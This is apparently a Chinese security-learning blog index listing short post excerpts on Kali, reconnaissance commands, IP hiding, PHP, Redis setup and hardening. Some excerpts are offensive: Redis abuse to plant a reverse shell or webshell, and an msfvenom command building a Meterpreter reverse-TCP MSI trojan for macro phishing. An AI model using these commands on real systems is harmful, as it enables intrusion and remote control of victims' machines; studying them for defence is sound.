Broken-year

信息搜集工具的使用bitvise远程连接kali 信息搜集：windows本地信息搜集：whoami #查看自己身份 whoami /all #获取当前域的信息 ipconfig /all #查看详细ip信息 arp -a

2022-03-21 网络安全

网络安全工具使用 windows

渗透测试系统以及渗透工具的了解入侵类操作系统承载工具比较多 kali 基于linux 一般安装方式： 1 通过install安装【但容易被追踪】 2 live光盘启动：iso光盘镜像——live方式启动，一切行为都是在内存里的，断电消失。

2022-03-21 网络安全

隐藏踪迹以及加密软件使用个人防护加密通讯真实ip非常重要，要用一种方法对真实ip保护起来 CDN cloudflare免费cdn 防止真实ip被人发现流量缓存个人信息泄露网络方面大部分人都会泄露自己的公网ip 暴露ip就会暴

2022-03-20 网络安全

操作系统以及公网服务器部署操作系统unix（开源、最安全）（C语言） Linux（目前大多数使用） DOS（当时是7.0）（比尔盖茨）【当时以上无图形界面】 macOS（闭源）（基于unix、linux） DOS–Windows（比尔盖茨

2022-03-20 服务器搭建

php入门新建一个index.php index是标准的网页首页命名 <?php echo "haha nihao"; ?> php代码代码必须使用变量 php是一种弱类型语言 <?php $a = 123; $b

2022-03-20 PHP

php 编程网页

网络安全行业以及周边介绍 1.不要用学的技术乱来 2.不要在一切国内平台发表不当言论 3.不要用使用的技术入侵国内任何机构普通工具 (lanzoux.com) 密码：6k6a 抓包先安装jre环境，安装完之后验证：cmd->jav

2022-03-20 网络安全

网络安全工具使用随笔

redis基本安全策略最好不要用root用户启动redis 单独为redis设置一个账号设置本地localhost不允许外部访问 redis保护模式protected-mode开启（默认开启）端口修改为其他端口（默认为6379） req

2022-03-19 数据库

redis和秘钥登录ubuntu redis的未授权访问是很危险的，需要打开密码功能 cd /etc/redis //进入redis nano redis.conf //打开配置文件在配置文件中加入 requirepass h

2022-03-19 数据库

redis数据库写入文件计划任务反弹shell（ubuntu不能，centos）写入一句话木马 ==在kali里面测试== 打开redis数据库 keys * set haha "\n\n

2022-03-19 数据库

Redis部署 redis数据库属于nosql系列的数据库，缓存类，支持数据持久化，擅长把内存数据直接读取关系型数据库 Ubuntu上安装==redis服务器安装== wget http://do

2022-03-18 数据库

内网和域windows域环境企业中的内网中，经常使用windows server 工作组work group 最简单的资源管理-工作站（组内的主机）域Domain 一般来说是计算机内网的一种形式域控，对多台主机进行控制有权利给

2022-03-18 环境搭建

网络安全 windows 域内网

钓鱼攻击Excel宏钓鱼在kali里生成一个木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f msi -o hack.msi

2022-03-18 网络安全